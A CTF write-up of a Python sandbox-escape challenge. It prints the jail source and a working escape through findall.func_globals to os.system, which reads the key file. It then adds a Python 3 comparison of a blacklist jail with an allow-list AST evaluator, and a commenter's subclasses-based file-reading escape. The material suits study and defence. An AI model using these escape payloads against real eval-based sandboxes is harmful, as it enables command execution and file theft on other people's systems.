7 – python jail
You are surrounded by zombies. You heard there’s a safe house nearby, but climbing fences is hard with a beer belly. Thank god, there’s another survivor over there. “Hey! Help me!”, you shout. He just laughs and shakes you off the fence. Asshole.
Later, you see his dead body lying in front of a high security door secured by automated weapons. Heh… karma is a bitch. But that means you’ll have to find another way in. In this nerd area, all the doors are secured with stupid computer puzzles. So, what the heck. Better try this one:
ctf.fluxfingers.net tcp/2045
Hint:
You’ll find the entrance in “./key”
Notes:
This challenge is a tribute to PHDays Finals 2012 challenge ‘ndevice’.
Thanks again, I had fun solving it.
I’m fairly certain that this challenge avoids being exploitable by the tricks we could use in PHDays (the module “os” was imported…). So, no advantage for people who did not attend PHDays.
Summary: python eval tricks
def make_secure():
    UNSAFE_BUILTINS = ['open', 'file', 'execfile', 'compile', 'reload', '__import__', 'eval', 'input'] ## block object?
    for func in UNSAFE_BUILTINS:
        del __builtins__.__dict__[func]

from re import findall

make_secure()

while True:
    try:
        inp = findall('\S+', raw_input())[0]
        a = None
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
        print 'Exception:', e
There are many solutions for this level. For example, we can use the findall function’s func_globals to reach the sys module, then os and its system function:
$ nc ctf.fluxfingers.net 2045
Go Ahead, Expoit me >;D
findall.func_globals['sys'].modules['os'].system("cat\x20./key")
findall.func_globals['sys'].modules['os'].system("cat\x20./key")
FvibLF0eBkCBk
Return Value: 0
The flag: FvibLF0eBkCBk
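Why the jail falls: deleting a few builtins does nothing about the object graph reachable through the globals of any function the input can still name. The added Python 3 example below (my code, not the challenge's) puts a blacklist evaluator in the challenge's spirit beside an allow-list evaluator built on the ast module. The names weak_eval, safe_eval, helper and rejects are my own; helper is an assumed stand-in for a function from a module that imported os, the way findall came from a module that had imported sys.

```python
import ast
import builtins
import operator
import os
from re import findall

# The challenge's approach, ported to Python 3: delete a few builtins, then
# eval the input. Any function left reachable (findall here, plus a helper
# from this module, which imported os) hands the caller its __globals__.
UNSAFE_BUILTINS = ['open', 'exec', 'eval', 'compile', '__import__', 'input']

def helper():
    """Stand-in (assumed) for a function defined in a module that imported os."""
    return None

def weak_eval(expr):
    """Jail in the style of the challenge: blacklist builtins, then eval."""
    safe = {k: v for k, v in builtins.__dict__.items() if k not in UNSAFE_BUILTINS}
    return eval(expr, {'__builtins__': safe, 'findall': findall, 'helper': helper})

ALLOWED_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub,
                  ast.Mult: operator.mul, ast.FloorDiv: operator.floordiv}

def safe_eval(expr):
    """Allow-list evaluator: int/float literals and four operators, nothing else.
    Names, attributes, subscripts and calls are rejected before evaluation, so
    there is no object graph to walk."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in ALLOWED_BINOPS:
            return ALLOWED_BINOPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError('rejected node: ' + type(node).__name__)
    return walk(ast.parse(expr, mode='eval'))

def rejects(expr):
    """True when safe_eval refuses expr instead of evaluating it."""
    try:
        safe_eval(expr)
    except (ValueError, SyntaxError):
        return True
    return False

if __name__ == '__main__':
    PROBE = "helper.__globals__['os'].__name__"   # constructed probe input
    print('weak jail:', weak_eval(PROBE))          # os
    print('allow-list:', rejects(PROBE), safe_eval('6 * 7'))   # True 42
```

The lesson carries over to the comment's subclasses trick too: an allow-list over the parsed syntax rejects Attribute and Call nodes outright, whereas a blacklist of names can never enumerate every path through the object graph.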
1 comment
Oh nice, thanks for the trick; here is mine:
().__class__.__base__.__subclasses__()[40]('./key','r').read()